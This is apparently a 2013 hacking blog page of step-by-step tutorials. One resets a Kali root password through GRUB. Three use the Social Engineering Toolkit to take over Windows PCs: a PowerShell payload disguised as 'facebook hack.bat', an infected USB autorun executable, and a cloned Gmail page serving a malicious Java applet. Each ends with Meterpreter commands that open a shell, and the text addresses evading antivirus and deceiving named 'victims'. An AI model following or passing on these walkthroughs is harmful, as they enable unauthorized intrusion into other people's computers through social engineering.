Friday, September 6, 2013

HOW TO HACK/RESET KALI LINUX LOGIN PASSWORD

0 comments
1.  First boot your kali linux and wait  untill the Grub will come,  
        
       As you will see the grub , then scroll down to recovery mode  

then press  E


2. After pressing E you will see this screen. Here you have to 
         
                            change some words and need to add some sentence as shown in image

 CHANGE  ro TO rw

AND ADD  init=/bin/bash


3. After changing and adding just press F10

After pressing F10 it will be reboot and you will see this screen, 

     Here you have to type a      
     
 COMMAND :  passwd root      and hit enter 


4. Then type your new root password, hit enter and again retype your 

root password and hit enter afterthat you will see a massage password update successfully 




5. Now power off by pressing your laptop/PC power button and switch 
on it again and login with your new password 




Hack Windows Vista,7,8 And Above PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus)

2 comments
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by,

Preventative Technologies.

Powershell Alphanumeric Shellcode Injector
Powershell Reverse Shell
Powershell Bind Shell
Powershell Dump SAM Database

SUPPORTED OS :  VISTA,7,8 AND ABOVE.

IN THIS TUTORIAL I HAVE HACKED MY OWN WINDOWS 7 PC.

OPEN THE SOCIAL ENGINEERING TOOKIT



CHOOSE NO 1 => SOCIAL-ENGINEERING ATTACKS


SELECT OPTION 10 => POWERSHELL ATTACK VECTORS


NOW SELECT OPTION 1 => POWERSHELL ALPHANUMERIC SHELLCODE INJECTOR


AFTER THAT PUT UR IP AND PORT THERE.

I WILL USE MY IP 192.168.152.132
PORT 443



NOW TYPE "YES" AND START LISTENER.


YOU HAVE TWO OPTION THERE x86 AND x64.

TYPE = >  x64

AND PRESS ENTER.


NOW YOU SEE THE LISTENER IS STARTED


IN THE KALI LINUX THE DIRECTORY OF FILES OF POWERSHELL CREATED IS 

/root/.set/reports/powershell

BUT IF U NOT FIND THEM SO JUST USED THE COMMAND TO COPY THE FILES.

I HAD MADE A FOLDER ON DESKTOP NAME LIKE POWERSHELL.



NOW AFTER FINISHED THE COPY U SEE THAT THE FILES ON YOUR FOLDER.


AFTER GOT THE FILES THE x64_powershell_injection.txt 

I HAVE CHANGED THEM TO facebook hack.bat

SEND THIS FILE TO VICTIM VIA CHAT, MESSAGING.



AFTER THE VICTIM MADE HIS/HER ACTION ON THE BATCH FILE THE EXPLOIT IS ON WORK.

AND YOU GOT THE SESSION FROM THE VICTIMS PC.


YEAH YOU GOT THE SYSTEM USING THE SESSION.

TYPE :  sessions -l     (to see the sessions list)

                                      TYPE :  sessions -i ID  (put here id=1 and you got the system)            

   TYPE :     sysinfo     ( to get the system details)

TYPE :  shell  (to get shell from victims pc)




Thursday, September 5, 2013

Hack Any Windows PC using USB Device and SET Toolkit (Infectious Media Generator Attack)

0 comments
ATTACK NAME : INFECTIOUS MEDIA GENRATOR ATTACK

ATTACKING OS :  ALL WINDOWS OS

THIS TECHNIQUE MOSTLY USED TO INFECT UR VICTIM USING EXECUTEABLE FILES FROM USB DEVICES. BECAUSE NOW A DAYS THE PEOPLE MOSTLY USE THE USB DEVICES TO TRANSFER DATA SO THAT'S THE REASON FOR BORN OF THE SOCIAL ENGINEERING ATTACK.

IN THIS TUTORIAL I HACKED MY OWN WINDOWS XP SP2 MACHINE..

OPEN SET TOOLKIT.


SELECT OPTION "1" => SOCIAL- ENGINEERING ATTACKS


SELECT OPTION 3 => INFECTIOUS MEDIA GENERATOR


SELECT OPTION 2 => STANDARD METASPLOIT EXECUTABLE


IT WANTS UR IP FOR REVERSE CONNECT TO UR PC..

JUST PUT UR IP ADDRESS MINE IS 192.168.152.132 SO I PUT IT THERE.


SELECT OPTION 2 => WINDOWS REVERSE_TCP METERPRETER


FOR ENECRYPT UR EXECUTABLE FILE USE ANY OF THE I WILL USE THE 
2).SHIKATA_GA_NAI

BUT ALTERNATIVE U CAN ALSO USE THE 15 AND 16 OPTION THEY ARE ALSO GOOD TO DO THE WORK...


AFTER THAT IT WANTS A PORT TO CONNECT..

I M USING THE 1234 AS A PORT...BUT U CAN USE UR OWN..


AFTER ADDING PORT THE EXECUTABLE FILE AND THE AUTORUN FILE CREATED...

U CAN GO TO THE DIRECTORY IN THE KALI LINUX SO U CAN GOT UR FILES WHICH U HAVE CREATE TO DO THIS ATTACK...

JUST SEND THIS TO FILE TO USB AND GIVE UR VICTIM .


NOW IT'S TIME TO LISTENING SO PUT "YES" AND ENETR U GOT A LISTENING SESSION.


NOW THE HANDLER IS START AND WAIT FOR THE VICTIMS ACTION.


YEAH THE VICTIM HAS ENTER THE USB IN HIS MACHINE AND THAT WHY U GOT THE SESSION 1 THERE...



ENETR THE COMMAND TO GET LIST OF OPEN SESSIONS.

COMMAND :  sessions -l




TO SELECT AND START THE SESSION JUST ENTER THE COMMAND ON TERMINAL.

COMMAND :  sessions -i ID


USE ANOTHER COMMAND TO SEE WHICH WINDOWS OS VERSION VICTIM IS USING

COMMAND :  sysinfo


TO GET A SHELL FROM THE VICTIMS PC U NEED TO ENTER THE COMMAND.

COMMAND :  shell


Tuesday, September 3, 2013

Bypassing Antivirus using Multi Pyinjector Shell Code Injection

0 comments
IN THIS TUTORIAL I HAVE HACKED MY OWN WINDOWS 8 PC..

WORKING PLATFORM : WINDOWS, LINUX, MAC

PREREQUEST : INSTALLED JAVA ON VICTIMS PC.

OPEN SET TOOLKIT:

APPLICATION > KALI LINUX > EXPLOITATION TOOLS > SOCIAL ENGINEERING TOOLKIT > SE-TOOLKIT



AFTER OPEN SET U SEE THAT.


LET'S CHOOSE NO "1" => SOCIAL-ENGINEERING ATTACKS


LET'S CHOOSE NO 2 => WEBSITE ATTACK VECTORS


SELECT OPTION 1 => JAVA APPLET ATTACK METHOD


LET'S CHOOSE OPTION 2 => SITE CLONER


SET NAT/PORT FORWARDING TO => "NO"


ENTER UR "IP-ADDRESS" HERE TO REVERSE CONNECTION


ENTER THE SITE WHICH U WANNA CLONE 
I AM USING GMAIL...


AFTER THAT THE TASK TO CHOOSE PAYLOAD JUST ENTER NO 16 => MULTIPYINJECTOR SHELLCODE INJECTION


CHOOSE 1 => WINDOW METERPRETER REVERSE TCP
CHOOSE PORT => 444 U CAN USE ANY PORT.


I AM CHOOSING TWO MORE PORTS SO THE SESSION OF HACKING IS BEING MORE POWERFUL..
I AM USING 444 AND 445 TWO MORE PORTS HERE.


NOW SELECT THE OPTION 6 => I'M FINISHED ADDING PAYLOAD.


YOU CAN SEE SOMETHING LIKE THIS.
IT STARTING THE PAYLOAD HANDLER AND WAITING FOR THE VICTIMS REPLY.




GIVE UR VICTIM UR IP ADDRESS MINE IS "192.168.152.132"
WHEN THE VICTIM PUT UR IP IN THEIR BROWSER HE/SHE GOT A JAVA POP UP.
WHEN HE/SHE RUN THIS APPLET THE MACHINE IS GONE HACKED.


NOW THE VICTIM HAS RUN UR APPLET IN HIS PC SO U GOT SOMETHING LIKE THIS.


AFTER THAT PUT A COMMAND IN THE SO YOU CAN GET THE SESSIONS U HAVE GOT FROM THE VICTIMS PC.

COMMAND :  sessions -l 


CHOOSE ANY SESSION OUT OF THERE USING THIS COMMAND = >  sessions -i ID
                    
                                                                  TYPE = >  shell 

TO GET THE SYSTEM..